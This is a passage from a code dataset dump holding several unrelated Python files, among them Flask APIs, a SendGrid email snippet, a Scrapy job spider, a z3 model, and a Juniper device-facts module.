'\n)\n\nwith open(\"documento de prueba.pdf\", \"rb\") as f:\n data = f.read()\n f.close()\n\nencoded = base64.b64encode(data).decode()\n\nattachedFile = Attachment(\n FileContent(encoded),\n FileName('attachment.pdf'),\n FileType('application/pdf'),\n Disposition('attachment')\n)\n\nmessage.attachment = attachedFile\n\nsg = SendGridAPIClient(\"api key sengrid\")\nresponse = sg.send(message)\n\nprint(f\"\"\"\n status_code: {response.status_code}\n\n body: {response.body}\n\"\"\")","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":859,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"627415197","text":"from flask import Flask, request, jsonify, render_template\nimport requests\n\napp = Flask(__name__)\n\napp.config['SECRET_KEY'] = \"oh-so-secret\"\n\nBASE_URL = \"http://numbersapi.com\"\n\n\n@app.route(\"/\")\ndef homepage():\n \"\"\"Show homepage.\"\"\"\n\n return render_template(\"index.html\")\n\n\n\"\"\"\"Get number data from API \"\"\"\n@app.route(\"/api/get-lucky-num\", methods=[\"POST\"])\ndef post_api():\n \"\"\"Post to API\"\"\"\n\n name = request.json[\"name\"]\n email = request.json[\"email\"]\n year = request.json[\"year\"]\n color = request.json[\"color\"]\n\n # check for valid inputs and return errors in JSON\n if name == \"\" or name.isspace() or color not in [\"red\", \"green\", \"orange\", \"blue\"] or year == \"\" or year.isspace():\n errors = []\n if name == \"\" or name.isspace():\n name = {\"name\": \"Name is required\"}\n errors.append(name)\n\n if year == \"\" or year.isspace():\n year = {\"year\": \"Year is required\"}\n errors.append(year)\n\n if color not in [\"red\", \"green\", \"orange\", \"blue\"]:\n color = {\n \"color\": \"Invalid color, must be one of: red, green, orange, blue\"}\n errors.append(color)\n return (jsonify(errors=errors), 201)\n\n else:\n\n random_num_resp = requests.get(url=f\"{BASE_URL}/random?json\")\n year_resp = requests.get(url=f\"{BASE_URL}/{year}?json\")\n\n num_json = random_num_resp.json()\n year_json = year_resp.json()\n\n # JSON response\n resp_json = {\n \"num\": {\n \"fact\": num_json[\"text\"],\n \"num\": num_json[\"number\"]\n },\n \"year\": {\n \"fact\": year_json[\"text\"],\n \"year\": year_json[\"number\"]\n }\n }\n return (resp_json, 201)\n","sub_path":"Part 3 - Lucky Nums/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1777,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"308448353","text":"##-*- coding: utf-8 -*-\n#!/usr/bin/python\n\"\"\"\nNumber to Hangul string util.\n\"\"\"\n\n__author__ = 'SeomGi, Han'\n__credits__ = ['SeomGi, Han']\n__copyright__ = 'Copyright 2015, Python Utils Project'\n\n__license__ = 'MIT'\n__version__ = '0.0.1'\n__maintainer__ = 'SeomGi, Han'\n__email__ = 'iandmyhand@gmail.com'\n__status__ = 'Production'\n\n\nHANGUL_NUMBER = [\n '', '일', '이', '삼', '사', '오', '육', '칠', '팔', '구', '십'\n]\nHANGUL_NUMBER_UNIT = [\n '', '십', '백', '천'\n]\nHANGUL_NUMBER_BIG_UNIT = [\n '', '만', '억', '조', '경', '해'\n]\n\n\nclass NumberUtils:\n\n _int_value = 0\n _string_value = ''\n _len_string_value = 0\n\n def __init__(self, int_value=0):\n self._int_value = int_value\n self._string_value = str(self._int_value)\n self._len_string_value = len(self._string_value)\n\n def convert_to_hangul_string(self):\n \"\"\"\n usage:\n numberutils.NumberUtils(220000112490).convert_to_hangul_string() == '이천이백억일십일만이천사백구십'\n \"\"\"\n\n result = ''\n if self._string_value and 
self._string_value.isdigit():\n index = 0\n while index < self._len_string_value:\n single_result = ''\n hangul_number = HANGUL_NUMBER[int(self._string_value[index])]\n if hangul_number:\n unit_index = ((self._len_string_value - index) % 4) - 1\n single_result += hangul_number + HANGUL_NUMBER_UNIT[unit_index]\n if (self._len_string_value - index - 1) % 4 == 0:\n big_unit_index = (self._len_string_value - index - 1) // 4\n if len(HANGUL_NUMBER_BIG_UNIT) > big_unit_index:\n single_result += HANGUL_NUMBER_BIG_UNIT[big_unit_index]\n result += single_result\n index += 1\n\n return result\n","sub_path":"loan_contracts/utils/numberutils.py","file_name":"numberutils.py","file_ext":"py","file_size_in_byte":1878,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"319647613","text":"#!/env/bin/python\nfrom flask import Flask, jsonify, request, abort\n\napp = Flask(__name__)\nvms = [\n\t{ \n\t'id':1,\n\t'name':'andev10hisge001',\n\t'moref':'234234ewfwfw',\n\t}\n]\n\n@app.route('/vm/v1.0/vms', methods=['GET'])\ndef get_vms():\n\treturn jsonify({'vms': vms})\n\n@app.route('/vm/v1.0/vms', methods=['POST'])\ndef add_vms():\n\tif not request.json or not 'name' in request.json:\n\n\t\tabort(400)\n\tvm = {\n\t\t'id': vms[-1]['id'] + 1,\n\t\t'name': request.json['name']\n\t}\n\tvms.append(vm)\n\treturn jsonify({'vm': vm}), 201\n\nif __name__ == '__main__':\n\tapp.run(debug=True)\n","sub_path":"rest.py","file_name":"rest.py","file_ext":"py","file_size_in_byte":552,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"424902078","text":"from datetime import datetime\nimport os\nimport time\n\n#handy script to clean the screen/make the program look nice\ndef clearscreen():\n os.system('cls' if os.name == 'nt' else 'clear')\n\n#how each task is constructed\n #name\n #date of task\n #time taken\n #extra notes\nclass Task():\n def __init__(self):\n pass\n\n #asks the user for a task name\n def get_task_name(self):\n clearscreen()\n name = input(\"Task Name: \")\n if name.upper != \"BACK\":\n self.name = name.upper()\n #asks the user for a task time\n def get_time(self):\n clearscreen()\n self.time = False\n while self.time == False:\n try:\n time = input('How long was the task?(Only Enter Min): ')\n self.time = str(int(time))\n except ValueError:\n print('Thats not a number!')\n #asks the user for extra notes\n def get_remarks(self):\n clearscreen()\n extra = input(\"Additional Notes? 
\").upper()\n self.extra = extra\n #asks the user for a date in MM/DD/YYYY Format\n def get_date(self):\n clearscreen()\n self.date = False\n while self.date == False:\n try:\n date = input(\"Please enter the date of task(MM/DD/YYYY): \")\n self.date = datetime.strptime(date, '%m/%d/%Y')\n except ValueError:\n clearscreen()\n print('Oops, Please Enter In Month(08), Day(04), Year(1990) Format!')\n time.sleep(2)\n #A really clean way of printing each task all at once\n def taskprinter(self):\n print(\"---------------------\")\n print('Task Name: ' + self.name)\n print('Task Date: ' + self.date.strftime('%m/%d/%Y'))\n print('Time Taken: ' + self.time + \" Minutes\")\n print('Extra: ' + self.extra)\n print(\"---------------------\")\n","sub_path":"task.py","file_name":"task.py","file_ext":"py","file_size_in_byte":1889,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"585944606","text":"##############################################################################\r\n# Copyright (c) 2016 by Patrick Kutch https://github.com/PatrickKutch\r\n# \r\n# Licensed under the Apache License, Version 2.0 (the \"License\");\r\n# you may not use this file except in compliance with the License.\r\n# You may obtain a copy of the License at\r\n# \r\n# http://www.apache.org/licenses/LICENSE-2.0\r\n# \r\n# Unless required by applicable law or agreed to in writing, software\r\n# distributed under the License is distributed on an \"AS IS\" BASIS,\r\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\r\n# See the License for the specific language governing permissions and\r\n# limitations under the License.\r\n##############################################################################\r\n# File Abstract: \r\n# Gets some system information\r\n##############################################################################\r\n\r\nimport platform\r\nimport os\r\nfrom collections import namedtuple\r\nimport multiprocessing\r\n\r\ndef GetPlatform():\r\n return platform.uname()[0]\r\n\r\ndef GetRelease():\r\n return platform.release()\r\n\r\ndef GetLinuxDistro():\r\n return str(platform.linux_distribution()[0] + \" \" + platform.linux_distribution()[1])\r\n\r\ndef GetCPUInfo_Model_Linux():\r\n retStr = os.linesep\r\n CPU = 0\r\n with open('/proc/cpuinfo') as f:\r\n for line in f:\r\n # Ignore the blank line separating the information between\r\n # details about two processing units\r\n if line.strip():\r\n if line.rstrip('\\n').startswith('model name'):\r\n model_name = line.rstrip('\\n').split(':')[1]\r\n return \"CPU.Model=\"+model_name.strip() + os.linesep\r\n return retStr\r\n\r\ndef GetCoreCount():\r\n return str(multiprocessing.cpu_count())\r\n\r\ndef GetMemoryInfo_Linux(item):\r\n retStr = \"\"\r\n with open('/proc/meminfo') as f:\r\n for line in f:\r\n data = line.split(':')\r\n if item == data[0]:\r\n return data[1].strip() + os.linesep\r\n return item + \"=Invalid Item\"\r\n\r\ndef __GetNetDevices_Linux():\r\n ''' RX and TX bytes for each of the network devices '''\r\n\r\n with open('/proc/net/dev') as f:\r\n net_dump = f.readlines()\r\n \r\n device_data={}\r\n data = namedtuple('data',['rx','tx'])\r\n for line in net_dump[2:]:\r\n line = line.split(':')\r\n if line[0].strip() != 'lo':\r\n device_data[line[0].strip()] = data(float(line[1].split()[0])/(1024.0*1024.0), \r\n float(line[1].split()[8])/(1024.0*1024.0))\r\n \r\n return device_data\r\n \r\n\r\ndef GetNetDevices_Linux():\r\n netdevs = __GetNetDevices_Linux()\r\n retStr = 
\"\"\r\n for dev in netdevs.keys():\r\n retStr += dev +\".txRate=\"+str(netdevs[dev].tx) + os.linesep\r\n retStr += dev +\".rxRate=\"+str(netdevs[dev].rx) + os.linesep\r\n retStr += dev +\".bxRate=\"+str(netdevs[dev].rx + netdevs[dev].rx) + os.linesep\r\n\r\n return retStr\r\n\r\ndef GetSystemInfo_Linux(outputFile):\r\n data = \"Platform=\"+GetPlatform() + os.linesep\r\n data += \"Distro=\" + GetLinuxDistro() + os.linesep\r\n data += GetCPUInfo_Model_Linux()\r\n data += \"Memory.Total=\" + GetMemoryInfo_Linux(\"MemTotal\") + os.linesep\r\n data += \"Memory.Free=\" + GetMemoryInfo_Linux(\"MemFree\") + os.linesep\r\n data += GetNetDevices_Linux()\r\n data += \"CoreCount=\" + GetCoreCount() + os.linesep\r\n\r\n\r\n file = open(outputFile,\"wt\")\r\n file.write(data)\r\n file.close()\r\n return \"HelenKeller\" # don't want to send anything\r\n\r\nGetSystemInfo_Linux(\"sysinfo.txt\") \r\n\r\n\r\n\r\n\r\n","sub_path":"Minion/Collectors/SystemInfo_Linux.py","file_name":"SystemInfo_Linux.py","file_ext":"py","file_size_in_byte":3646,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"121468501","text":"########################################\r\n### define all events and finite sets\r\n########################################\r\n\r\nfrom z3 import *\r\nfrom finite_set import *\r\n\r\n#Channe, (a,b,c,d) = EnumSort('Channe', ('a','b','c','d'))\r\n\r\nN = 3\r\n\r\n## declare channels and (compounded) events\r\n\r\nChannel, (pickup, putdown) = EnumSort('Channel', ('pickup', 'putdown'))\r\n\r\nEvent = Datatype('Event')\r\nEvent.declare('CE', ('channel', Channel), ('phil', IntSort()), ('fork', IntSort()))\r\nEvent = Event.create()\r\n\r\nCE = Event.CE\r\n#channel = Event.channel\r\nphil = Event.phil\r\nneigh = Event.neigh\r\n\r\n\r\n\r\n\r\n## declare finite sets\r\nAllEvents = list(set([CE(pickup,i,i) for i in range(N)] + [CE(pickup,i,(i+1)%N) for i in range(N)] + [CE(pickup,(i-1)%N,i) for i in range(N)])) +\\\r\n list(set([CE(putdown,i,i) for i in range(N)] + [CE(putdown,i,(i+1)%N) for i in range(N)] + [CE(putdown,(i-1)%N,i) for i in range(N)]))\r\n\r\n#print AllEvents\r\n\r\nSetSort = FSetSort(AllEvents)\r\nSet = FSetDecl(AllEvents)\r\nFullset = Set.fullset()\r\n\r\n\r\n\r\n","sub_path":"examples/dining philosopher/event_philosophers.py","file_name":"event_philosophers.py","file_ext":"py","file_size_in_byte":1022,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"286594781","text":"# -*- coding: utf-8 -*-\n\"\"\"\n This spider is a NGSRU spider created on top of the ATSSpider\n scrapy crawl ngs_ru -a mining_job_id=9999 -a iteration=1 -a extract=1 -a url=\"http://rabota.ngs.ru/vacancy?q=&rubric%5B%5D=\"\n\n sample job url:\n http://rabota.ngs.ru/vacancy/Voditel_taksi_plan_ot_1000_r?id=49034325\n\"\"\"\n\nfrom json import loads as json_loads\nfrom re import compile\nfrom scrapy.http import Request\nfrom scrapy.selector import Selector\nfrom urlparse import urljoin\n\nfrom brightcorp.base.atsspiders import ATSSpider\nfrom brightcorp.items import BrightcorpItemLoader\nfrom brightcorp.processors import Prefix\n\n\nclass NGSRU(ATSSpider):\n\n name = \"ngs_ru\"\n disable_default_field_extractors = True\n City_Id = compile(r\"city = (\\d+)\")\n Ref_Num = compile(r\"\\?id=(\\d+)\")\n cur_offset = 0\n download_delay = 0.3\n\n def parse(self, response):\n selector = Selector(response)\n if not self.expected_job_count_set:\n job_count = selector.xpath(\n 
'//a[text()=\"%s\"]/following-sibling::span[@class=\"count\"]/text()' % unicode('Вакансии', 'utf-8')\n ).extract()\n if job_count:\n self.expected_job_count = job_count\n\n jobs = selector.xpath(\n '//div[@class=\"ra-elements-container\"]/ul[@class=\"ra-elements-list-hidden\"]/li'\n )\n for job in jobs:\n url = job.xpath(\n './/a[contains(@href, \"/vacancy/\")]/@href').extract()\n if url:\n job_url = urljoin(response.url, url[0])\n meta = {\n 'title': job.xpath(\n '..//a[contains(@href, \"/vacancy/\")]/h3/text()'\n ).extract(),\n 'company': job.xpath(\n './/a[contains(@href, \"/company/\")]/text()'\n ).extract(),\n 'url': job_url,\n }\n yield Request(\n callback=self.parse_jobdetails_redirect,\n meta=meta,\n url=job_url\n )\n\n if self.expected_job_count and self.cur_offset == 0:\n tot_pages = int(self.expected_job_count[0].replace(' ', '')) // 10\n for i in xrange(2, tot_pages, 1):\n self.cur_offset += 10\n yield Request(\n callback=self.parse,\n url=urljoin(\n response.url,\n '/vacancy?limit=10&offset=%s' % self.cur_offset\n )\n )\n\n def parse_jobdetails_redirect(self, response):\n city_id = self.City_Id.search(response.body)\n ref_num = self.Ref_Num.search(response.url)\n if city_id and ref_num:\n job_url = urljoin(\n response.url,\n '/api/v1/vacancies/%s/?city_id=%s' % (\n ref_num.group(1), city_id.group(1)\n )\n )\n response.meta['ref_num'] = ref_num.group(1)\n yield Request(\n callback=self.parse_job_callback(),\n meta=response.meta,\n url=job_url\n )\n\n def parse_job(self, response):\n data = json_loads(response.body)\n vacancies = data.get('vacancies', [])\n if vacancies:\n vacancy = vacancies[0]\n loader = BrightcorpItemLoader(selector=vacancy)\n\n loader.add_value('baseSalary', vacancy.get('salary', ''))\n loader.add_value('description', vacancy.get('description', ''))\n\n if vacancy.get('working_type', {}):\n loader.add_value(\n 'jobtype', vacancy.get('working_type', {}).get('title', '')\n )\n\n if vacancy.get('contact', {}):\n loader.add_value(\n 'location', vacancy.get('contact', {}).get('address', '')\n )\n\n if vacancy.get('experience_length', {}):\n loader.add_value(\n 'experiencerequirements',\n vacancy.get('experience_length', {}).get('title', '')\n )\n\n loader.add_value(\n 'referencenumber', response.meta.get('ref_num'),\n Prefix('%s-' % self.name)\n )\n loader.add_value('company', response.meta.get('company'))\n loader.add_value('title', response.meta.get('title'))\n loader.add_value('url', response.meta.get('url'))\n\n yield loader.load_item()\n","sub_path":"brightcorp/brightcorp/spiders/ngs_ru.py","file_name":"ngs_ru.py","file_ext":"py","file_size_in_byte":4529,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"35134743","text":"import pygame\n\nMAX_POP = 500\nMALE_MOVEMENT = 5\nMALE_SPREAD = 10\nFEMALE_SPREAD = 20\n\nbase = {\n \"WIDTH\":600 ,\n \"HEIGHT\": 600,\n \"OUTPUT_WIDTH\": 0,\n \"PLANT_AREA_WIDTH\": 0,\n \"FINAL_WIDTH\": 0,\n \"FPS\": 25,\n \"WHITE\": (255, 255, 255),\n \"BLACK\": (0, 0, 0),\n \"RED\": (255, 0, 0),\n \"BLUE\": (0, 0, 255),\n \"YELLOW\": (255, 255, 0),\n \"GREEN\": (0, 255, 0),\n \"P_HEIGHT\": 8,\n \"P_WIDTH\": 8,\n \"SEX\": ('M', 'F'),\n \"max_pop\": MAX_POP,\n \"start_pop\": int(MAX_POP * .75),\n}\n\nEND_BACK = pygame.Rect(0, 0, base['HEIGHT'], base['FINAL_WIDTH'])\n\np1 = [('A', 'A'), ('B', 'B'), ('C', 'C')] #, ('D', 'd') , ('E', 'e'), ('F', 'f')]\np2 = [('A', 'a'), ('B', 'b'), ('C', 'c')] #, ('D', 'D')] # , ('E', 'e')]#, ('F', 'f')]\n\nparents = [p1, p2]\n\nphenotypes = {\"dom\": 
{\n \"A\": \"Tall\",\n \"B\": \"Broad Leaf\",\n \"C\": \"Citrus\",\n \"D\": \"Green\",\n \"E\": \"Pine\",\n \"F\": \"THC\"\n},\n \"res\": {\n \"a\": \"Short\",\n \"b\": \"Narrow Leaf\",\n \"c\": \"Earthy\",\n \"d\": \"Purple\",\n \"e\": \"Fuel\",\n \"f\": \"CBD\"\n },\n \"codom\": {\n \"BB\": {\"life_exp\": 1.2},\n \"AA\": {\"life_exp\": 2},\n \"aa\": {\"life_exp\": 1},\n \"bb\": {\"life_exp\": 1},\n \"aA\": {\"life_exp\": 1},\n \"bB\": {\"life_exp\": 1},\n \"Aa\": {\"life_exp\": 1},\n \"Bb\": {\"life_exp\": 1},\n },\n \"linked\": {\n \"AA\": {\"height\": 2},\n \"aa\": {\"height\": 1},\n \"bb\": {\"width\": 1},\n \"BB\": {\"width\": 3},\n }\n}\n\nevent_triggers = {\n \"pop_trigger1\": .9,\n \"pop_trigger2\": .25,\n \"pop_trigger3\": .1,\n}\n\nplant_details = {\n 'm_life_min': 100,\n 'm_life_max': 600,\n\n 'min_males': MAX_POP * .05,\n 'male_movement': MALE_MOVEMENT,\n 'male_movement_min': MALE_MOVEMENT * -1,\n\n 'male_spread': MALE_SPREAD,\n 'male_spread_min': MALE_SPREAD * -1,\n\n 'f_life_min': 60000,\n 'f_life_max': 70000,\n 'mm_age': 9000,\n\n 'female_spread': FEMALE_SPREAD,\n 'female_spread_min': FEMALE_SPREAD * -1,\n\n 'max_pollination': 150,\n 'death': 0,\n\n 'mutation_point': 50,\n\n}\n\n# Leave these alone\nmutation_count = 0\ntotal_males = 0\ntotal_females = 0\nmax_gen = [0]\nmax_mom_age = [0]","sub_path":"Life Simulator/gen_settings.py","file_name":"gen_settings.py","file_ext":"py","file_size_in_byte":2141,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"136282073","text":"\"\"\"\nFacts module to gather system facts\n\"\"\"\nimport logging\nimport re\nfrom jnpr.junos.device import Device as Pyez_Device\nfrom jnpr.toby.hldcl.host import Host\nfrom jnpr.toby.exception.toby_exception import TobyException, TobyConnectFail\n\nclass DeviceData(Host):\n \"\"\"\n Facts class to gather device details\n \"\"\"\n def __init__(self, *args, **kwargs):\n # Check if host is provided\n if 'host' not in kwargs:\n raise TobyException(\"'host' is mandatory\")\n kwargs['os'] = kwargs.get('os', 'JUNOS')\n\n # Connect to given hostname/\n self.reg = None\n self.node_name = None\n self._kwargs = kwargs\n self.host = kwargs['host']\n self.handle = self._connect()\n self.model = self.get_model()\n mat = re.search(r'(\\D+)\\d*', self.model, re.I)\n if mat:\n self.series = mat.group(1).upper()\n else:\n raise TobyException('Could not determine model')\n\n def _get_credentials(self):\n \"\"\"\n Populates self.user and self.password based on user inputs. If user\n has not provided then try to get them from default credentials. Else\n raise an exception.\n\n :param kwargs: Keyword arguments provided by the user to create a\n device object\n\n :return: Tuple containing username and password\n \"\"\"\n # Check if user and password are passed arguments\n if not self._kwargs.get('user') or not self._kwargs.get('password'):\n from jnpr.toby.frameworkDefaults.credentials import JUNOS\n # Check if default credentials are available\n if not JUNOS['USERNAME'] or not JUNOS['PASSWORD']:\n raise TobyException(\"Username/Password cannot be determined\")\n return JUNOS['USERNAME'], JUNOS['PASSWORD']\n return self._kwargs['user'], self._kwargs['password']\n\n def _connect(self):\n # Default connect_mode to ssh\n connect_mode = self._kwargs.get('connect_mode', 'ssh').lower()\n # Check for valid connect modes\n if connect_mode not in ('telnet', 'ssh', 'console', 'netconf'):\n raise TobyException(\n 'Invalid connect mode({0}) specified. 
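# --- hedged example (not part of the source corpus) -------------------------
# A minimal sketch of the PyEZ connection pattern used above, mirroring the
# device_args dict it builds; host and credential values are placeholders.
from jnpr.junos import Device

def open_junos(host, user, passwd, mode=None, port=None):
    args = {'host': host, 'user': user, 'passwd': passwd, 'gather_facts': False}
    if mode:                 # 'telnet' is used above for telnet/console transport
        args['mode'] = mode
    if port is not None:
        args['port'] = port
    dev = Device(**args)
    dev.open()               # raises a PyEZ connect error on failure
    return dev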
Connect mode can be '\n 'telnet/ssh/console/netconf'.format(connect_mode)\n )\n handle = None\n try:\n user, password = self._get_credentials()\n device_args = {'host': self._kwargs['host'], 'user': user,\n 'passwd': password, 'gather_facts': False}\n if connect_mode == 'ssh':\n device_args['port'] = 22\n if connect_mode == 'telnet' or connect_mode == 'console':\n device_args['mode'] = 'telnet'\n if 'pyez_port' in self._kwargs and self._kwargs['pyez_port'] is not None:\n device_args['port'] = int(self._kwargs['pyez_port'])\n handle = Pyez_Device(**device_args)\n handle.open()\n except Exception as exp:\n t.log(level=\"DEBUG\", message=\"Could not connect to device \" + self._kwargs['host'] + \":\" + str(exp))\n raise TobyConnectFail(\"Could not connect to device \" + self._kwargs['host'] + \":\" + str(exp))\n return handle\n\n def _get_juniper_node_facts(self):\n # Populate common properties\n facts_list = self._get_juniper_details()\n self.reg = facts_list[1]\n devip = self._get_host_ip(re_name=self.reg)\n is_dual_re = facts_list[0]\n hostname = facts_list[2]\n model = facts_list[3]\n devos = facts_list[4]\n facts_re = {'name': hostname, 'mgt-ip': devip, 'model': model, 'osname': devos}\n facts_node = {'controllers': {self.reg: facts_re}}\n\n if is_dual_re:\n other_re = facts_list[5]\n other_re_ip = self._get_host_ip(re_name=other_re)\n other_re_hostname = facts_list[6]\n other_re_model = facts_list[7]\n other_re_os = facts_list[8]\n facts_re = {'name': other_re_hostname, 'mgt-ip': other_re_ip,\n 'model': other_re_model, 'osname': other_re_os}\n facts_node['controllers'][other_re] = facts_re\n\n facts_node['osname'] = facts_node['controllers']['re0']['osname']\n facts_node['model'] = facts_node['controllers']['re0']['model']\n return facts_node\n\n def _get_srx_facts(self):\n self.reg = 're0'\n facts_list = self._get_srx_details()\n is_ha = facts_list[0]\n node_name = facts_list[1]\n if node_name == 'node0':\n self.node_name = 'primary'\n elif node_name == 'node1':\n self.node_name = 'slave'\n hostname = facts_list[2]\n model = facts_list[3]\n devos = facts_list[4]\n if is_ha:\n devip = self._get_host_ip_srx(node=self.node_name)\n else:\n devip = self._get_host_ip_srx(node=self.reg)\n facts_re = {'name': hostname, 'mgt-ip': devip, 'model': model, 'osname': devos}\n facts_node = {'controllers': {self.reg: facts_re}}\n facts_system = {self.node_name: facts_node}\n facts_system['primary']['osname'] = facts_system['primary']['controllers']['re0']['osname']\n facts_system['primary']['model'] = facts_system['primary']['controllers']['re0']['model']\n facts_system['primary']['name'] = facts_system['primary']['controllers']['re0']['name']\n facts_system['primary']['mgt-ip'] = facts_system['primary']['controllers']['re0']['mgt-ip']\n if is_ha:\n other_node_re = 're0'\n other_node_name = self._other_node_name()\n other_node_ip = self._get_host_ip_srx(node=other_node_name)\n other_node_hostname = facts_list[6]\n other_node_model = facts_list[7]\n other_node_os = facts_list[8]\n facts_re = {'name': other_node_hostname, 'mgt-ip': other_node_ip,\n 'model': other_node_model, 'osname': other_node_os}\n facts_node = {'controllers': {other_node_re: facts_re}}\n facts_system[other_node_name] = facts_node\n facts_system['slave']['osname'] = facts_system['slave']['controllers']['re0']['osname']\n facts_system['slave']['model'] = facts_system['slave']['controllers']['re0']['model']\n facts_system['slave']['name'] = facts_system['slave']['controllers']['re0']['name']\n facts_system['slave']['mgt-ip'] = 
facts_system['slave']['controllers']['re0']['mgt-ip']\n return facts_system\n\n def _get_juniper_details(self):\n response = self.handle.cli(command='show version invoke-on all-routing-engines',\n format='xml', warning=False)\n try:\n multi_re = response.findall('multi-routing-engine-item')\n except:\n raise TobyException('Could not connect to the other RE.')\n if len(multi_re) > 0:\n re_name0 = multi_re[0].find('re-name').text\n model0 = multi_re[0].find('software-information/product-model').text\n host_name0 = multi_re[0].find('software-information/host-name').text\n os_list = multi_re[0].findall('software-information/package-information')\n os0 = 'junos'\n try:\n re_name1 = multi_re[1].find('re-name').text\n model1 = multi_re[1].find('software-information/product-model').text\n host_name1 = multi_re[1].find('software-information/host-name').text\n os_list1 = multi_re[1].findall('software-information/package-information')\n os1 = 'junos'\n dual_re = True\n except:\n re_name1 = None\n model1 = None\n host_name1 = None\n os1 = None\n dual_re = False\n facts_list = [dual_re, re_name0, host_name0, model0, os0, re_name1, host_name1,\n model1, os1]\n else:\n try:\n if 're-name' in response:\n re_name = response.find('re-name').text\n else:\n re_name = 're0'\n model = response.find('product-model').text\n host_name = response.find('host-name').text\n os_list = response.findall('package-information')\n devos = os_list[0].find('name').text\n facts_list = [False, re_name, host_name, model, devos, None, None, None, None]\n except:\n raise TobyException('Could not retrieve details')\n return facts_list\n\n def _get_srx_details(self):\n response = self.handle.cli(command='show version', format='xml', warning=False)\n multi_re = response.findall('multi-routing-engine-item')\n if len(multi_re) > 0:\n node_name0 = multi_re[0].find('re-name').text\n model0 = multi_re[0].find('software-information/product-model').text\n host_name0 = multi_re[0].find('software-information/host-name').text\n os_list = multi_re[0].findall('software-information/package-information')\n os0 = os_list[0].find('name').text\n node_name1 = multi_re[1].find('re-name').text\n model1 = multi_re[1].find('software-information/product-model').text\n host_name1 = multi_re[1].find('software-information/host-name').text\n os_list1 = multi_re[1].findall('software-information/package-information')\n os1 = os_list1[0].find('name').text\n dual_re = True\n facts_list = [dual_re, node_name0, host_name0, model0, os0, node_name1,\n host_name1, model1, os1]\n else:\n try:\n node_name = 'node0'\n model = response.find('product-model').text\n host_name = response.find('host-name').text\n os_list = response.findall('package-information')\n devos = os_list[0].find('name').text\n facts_list = [False, node_name, host_name, model, devos, None, None, None, None]\n except:\n raise TobyException('Could not retrieve details')\n return facts_list\n\n def get_model(self):\n \"\"\"\n Returns model of the device\n \"\"\"\n version = self.handle.rpc.get_software_information()\n multi_re = version.findall('multi-routing-engine-item')\n if len(multi_re) > 0:\n model = multi_re[0].find('software-information/product-model').text\n if re.search(r'MX\\d+', model, re.I):\n return 'MX'\n elif re.search(r'VSRX', model, re.I):\n return 'VSRX'\n elif re.search(r'SRX\\d+', model, re.I):\n return 'SRX'\n elif re.search(r'ex\\d+', model, re.I):\n return 'EX'\n elif re.search(r'qfx\\d+', model, re.I):\n return 'QFX'\n elif re.search(r'ocx\\d+', model, re.I):\n return 'OCX'\n elif 
re.search(r'nfx\\d+', model, re.I):\n return 'NFX'\n else:\n return model\n try:\n model = version.find('product-model').text\n except:\n raise TobyException('Could not retrieve model')\n return model\n\n def _other_re_slot_name(self):\n \"\"\"\n Other RE name\n :return: Return other RE name\n \"\"\"\n other_re = None\n if self.reg == 're0':\n other_re = 're1'\n elif self.reg == 're1':\n other_re = 're0'\n return other_re\n\n def _other_node_name(self):\n \"\"\"\n Other Node name\n :return: Return other Node name\n \"\"\"\n other_node = None\n if self.node_name == 'primary':\n other_node = 'slave'\n elif self.node_name == 'slave':\n other_node = 'primary'\n return other_node\n\n def _get_host_ip(self, re_name):\n \"\"\"\n Get the management IP of RE\n\n :param re_name: Name of RE whose management IP needs to be retrieved\n :return: Management IP address. Raises exception in case of failure.\n \"\"\"\n re_name = re_name.lower()\n host_ip = None\n response1 = self.handle.rpc.get_configuration({'database': 'committed'})\n response = response1.findall('groups[name=\"{0}\"]'.format(re_name))\n if len(response) == 0:\n response = response1.findall('groups[name=\"{0}\"]'.format('member0'))\n em0_data = response[0].find('interfaces/interface[name=\"em0\"]')\n if em0_data is not None:\n host_ip = em0_data.find('unit/family/inet/address/name').text\n else:\n fxp0_data = response[0].find('interfaces/interface[name=\"fxp0\"]')\n if fxp0_data is not None:\n host_ip = fxp0_data.find('unit/family/inet/address/name').text\n if not host_ip:\n raise TobyException('Could not determined other RE management IP')\n #host_ip = host_ip.split('/')[0]\n return host_ip\n\n def _get_host_ip_srx(self, node):\n \"\"\"\n Get the management IP of chassis\n\n :param re_name: Name of RE whose management IP needs to be retrieved\n :param node: Name of the srx node('node0'/'node1')\n :return: Management IP address. 
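# --- hedged example (not part of the source corpus) -------------------------
# A minimal sketch of the committed-config lookup performed above: pull the
# configuration via RPC, locate the group, and walk to the fxp0 inet address.
# The `dev` handle is assumed to be an open PyEZ Device; the group name is an
# illustrative default.
def fxp0_address(dev, group='re0'):
    config = dev.rpc.get_configuration({'database': 'committed'})
    grp = config.find('groups[name="%s"]' % group)
    if grp is None:
        return None
    addr = grp.find(
        'interfaces/interface[name="fxp0"]/unit/family/inet/address/name')
    return addr.text if addr is not None else None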
